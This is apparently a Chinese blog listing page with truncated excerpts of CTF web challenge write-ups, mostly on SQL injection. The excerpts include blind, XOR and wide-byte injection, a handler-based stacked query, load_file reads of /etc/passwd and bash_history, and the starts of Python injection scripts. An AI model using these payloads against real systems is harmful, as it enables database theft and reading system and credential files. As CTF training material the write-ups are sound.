2020年02月23日
<?php
# flag在fl4g里
include 'waf.php';
header("Content-type: text/html; charset=utf-8");
$db = 
2020年02月22日
测试出注入点2-(ascii(substr(database(),1,1))>1)由于过滤了or和union select,无法通过常规手段获取表名和字段名,使用mysql5.7新特性获得表名,使用select语句比较时按各字段进行比较的特点,来构造盲注语句,代码如下:#encoding=utf-8
import requests
def str_to_hex(s):
return '
2020年02月22日
熟悉的界面,点击输入框,出现以前的题输入过的payload,试一试就得到了flag,应该是原题1';show tables;#1';handler FlagHere open;handler FlagHere read first;#
2020年02月22日
宽字节注入+存储过程绕过+语句转十六进制脚本如下import requests
flag = ""
cookie = {
'ci_session': '934c5dbfca4a789a17b73c1f36c6ec78b81b02b3',
'UM_distinctid
2019年12月13日
git泄露python GitHack.py http://xxxxxxxx/.git根据提示去猜解爆破即可user:zhangwei pass:zhangwei666代码审计后发现注入点查询/etc/passwd : ',content=(select load_file('//etc/passwd')),/*闭合查询语句得到结果以此方法继续查询/bin/bash_history : ',content=(select loa
2019年12月13日
注入脚本:# coding=utf-8
import re
import requests
import sys
import binascii
import json
reload(sys)
sys.setdefaultencoding("utf8")
url = "http://182.92.220.157:11116/index.php?r=Login/Logi
2019年12月12日
知识点:sql注入注入点 0'/**/||/**/ascii(substr((select/**/pass/**/from/**/users/**/where/**/name='flag'),0,1))/**/>/**/ascii('53')/**/||/**/'0先注册个用户,然后发布广告广告的title可以注入注入脚本# coding=utf-8
import re
import r
2019年10月29日
利用抑或注入# coding=utf-8
import requests
dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,-{}"
url = "http://f1f5f36b-b735-4827-8ff2-1582d26acb7b.node3.buuoj.cn/index.php"
keyw
2019年10月24日
0x00 前言在ctf比赛中难免会遇到一些比较有(keng)趣(die)的注入题,需要我们一步步的绕过waf和过滤规则,这种情况下大多数的注入方法都是盲注。然而在盲注过程中由于这些过滤规则不太好绕过,这时候就会无从下手,下面分享一下自己在比赛中总结几种比较通用的盲注手法和一些小tips,希望能在今后大家的比赛或者实战中带来一些实质性的帮助。0x01 XOR注入1、基本注入payloadadmin'^(ascii(mid((password)from(i)))>j)^'1
2019年10月24日
`http://web2.sniperoj.cn:10004/?username&password`得到信息:Flag is the password of admin!所以接下来的思路应该是拿admin的password,肯定是注入了然后根据题目观察来看,应该是一道盲注题,但是我尝试了一些姿势,但是不太懂为何我的payload不能照我预期进行,我也进行了本地测试,但是本地是成功的……所以很郁闷,所以引用了网上别的的脚本:#!/usr/bin/python
# coding: